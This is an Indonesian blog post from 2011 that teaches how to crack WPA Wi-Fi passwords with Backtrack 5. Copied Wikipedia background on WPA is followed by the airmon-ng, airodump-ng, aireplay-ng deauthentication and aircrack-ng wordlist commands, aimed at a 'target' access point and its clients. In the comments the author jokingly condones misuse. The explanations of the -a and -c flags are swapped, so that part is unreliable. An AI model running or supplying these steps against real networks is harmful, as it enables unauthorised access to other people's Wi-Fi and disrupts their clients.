Cracking Password Wifi WPA key ( Backtrack 5 )

Posted: Selasa, 18 Oktober 2011 | Diposting oleh rukmana mulya | Label: ,
WPA atau (Wi-Fi Protected Access) adalah suatu sistem yang juga dapat diterapkan untuk mengamankan jaringan nirkabel. Metoda pengamanan dengan WPA ini diciptakan untuk
melengkapi dari sistem yamg sebelumnya, yaitu WEP. Para peneliti menemukan banyak celah dan kelemahan pada infrastruktur nirkabel yang menggunakan metoda pengamanan WEP. Sebagai pengganti dari sistem WEP, WPA mengimplementasikan layer dari IEEE, yaitu layer 802.11i. Nantinya WPA akan lebih banyak digunakan pada implementasi keamanan jaringan nirkabel. WPA didesain dan digunakan dengan alat tambahan lainnya, yaitu sebuah komputer pribadi (PC).

Fungsi dari komputer pribadi ini kemudian dikenal dengan istilah authentication server, yang memberikan key yang berbeda kepada masing–masing pengguna/client dari suatu jaringan nirkabel yang menggunakan akses point sebagai media sentral komunikasi. Seperti dengan jaringan WEP, metoda enkripsi dari WPA ini juga menggunakan algoritma RC4.
Pengamanan jaringan nirkabel dengan metoda WPA ini, dapat ditandai dengan minimal ada tiga pilihan yang harus diisi administrator jaringan agar jaringan dapat beroperasi pada mode WPA ini. Ketiga menu yang harus diisi tersebut adalah:
  • Server
    • Komputer server yang dituju oleh akses point yang akan memberi otontikasi kepada client. beberapa perangkat lunak yang biasa digunakan antara lain freeRADIUS, openRADIUS dan lain-lain.
  • Port
    • Nomor port yang digunakan adalah 1812.
  • Shared Secret
    • Shared Secret adalah kunci yang akan dibagikan ke komputer dan juga kepada client secara transparant.
Setelah komputer diinstall perangkat lunak otontikasi seperti freeRADIUS, maka sertifikat yang dari server akan dibagikan kepada client.
Untuk menggunakan Radius server bisa juga dengan tanpa menginstall perangkat lunak di sisi komputer client. Cara yang di gunakan adalah Web Authentication dimana User akan diarahkan ke halaman Login terlebih dahulu sebelum bisa menggunakan Jaringan Wireless. Dan Server yang menangani autentikasi adalah Radius server.

Ok mungkin cukup jelas penjelasan yang saya copy paste dari wikipedia diatas tentang WPA,dimana jaringan nirkabel atau wireles yang diproteksi oleh key ini agak lebih aman daripada WEP,akan tetapi dalam suatu system jaringan tidak ada yang 100% aman dan masih banyak celah yang dapat dimanfaatkan oleh para attacker.ok dalam praktek ini,mari kita buktikan seberapa amankah security WPA ini.

Dalam kasus ini  para attacker memerlukan beberapa alat perang yang  wajib ada diantaranya

PC/Laptop
Wireles/Usb Wirles + Antena Outdor (untuk jarak jauh)

Oh ya Perlu diketahui untuk mengcrack password wifi WPA key ini memerlukan Wordlist,dimana wordlist ini nantinya akan disamakan dengan hasil snifing accses point target dengan backtrack5 apabila ada yang sama maka proses cracking pasti berhasil akan tetapi apabila dalam wordlist tidak ada pasword yang cocok atau yang sama dengan password accses point target  maka proses cracking tidak akan berhasil
 
Dalam percobaan kali ini,saya menggunakan OS Backtrack 5 R1 pada mesin Vmware workstation.di windows7 dan satu buah wireles USB yang suport untuk linux dalam kasus ini saya menggunakan wirless USB TP-Link TL-WN722N 

Buat temen temen yang belum tau apa itu Vmware sebaiknya baca terlebih dahulu artikel saya sebelumnya tentang Instal Backtrack 5 R1 On Vmware Untuk memulai proses cracking,tentunya dibutuhkan pengetahuan dasar dan consule consule yang telah ditentukan dalam praktek ini kita menggunakan beberapa consule diantaranya airmon-ng,airodump-ng,danjuga aircrack-ng Baik kita mulai saja,langkah pertama runing OS backtrack5 di vmware,jika sudah masuk pada tampilan desktop kemudian buka terminal dan ketikan


airmon-ng
  
airmon-ng start wlan0
  
airodump-ng mon0

airodump-ng -c 1 --bssid XX:XX:XX:XX:XX -w filehasilsniffing mon0

keterangan XX:XX:XX:XX:XX masukan bssid accsess point target

aireplay-ng -0 0 -a XX:XX:XX:XX:XX -c XX:XX:XX:XX:XX mon0

keterangan -0 0 code deauth 
-a XX:XX:XX:XX:XX bssid client target
-c XX:XX:XX:XX:XX bssid Acsess Point

(sampai diatasnya keluar WPA handshake)

ls 

(cari file filehasilsniffing.cap)

aircrack-ng -w worldlist filehasilsnif.cap

tunggu proses cracking ,apabila berhasil maka akan ada keterangan key found

Ok langsung saja perhatikan video praktek yang saya buat di bawah ini



Source : Wikipedia

6 komentar:

  1. Kholidil Amin mengatakan...
  2. good gan

  3. Kholidil Amin mengatakan...
  4. Posting ini telah dihapus oleh administrator blog.

  5. rukmana mulya mengatakan...
  6. @kholidil amin hoho sama sama sob jangan kapok yah mampir ke blog saya

  7. Anonymous mengatakan...
  8. ilmu yang mantafffff.....!!!,thanxz brther...

  9. rukmana mulya mengatakan...
  10. @anonim hoho siap2 jangan disalah gunakan yah bro,kalo kepepet mah sih gak apaapa hihihi

  11. Khocet mengatakan...
  12. mantap gan....

Posting Komentar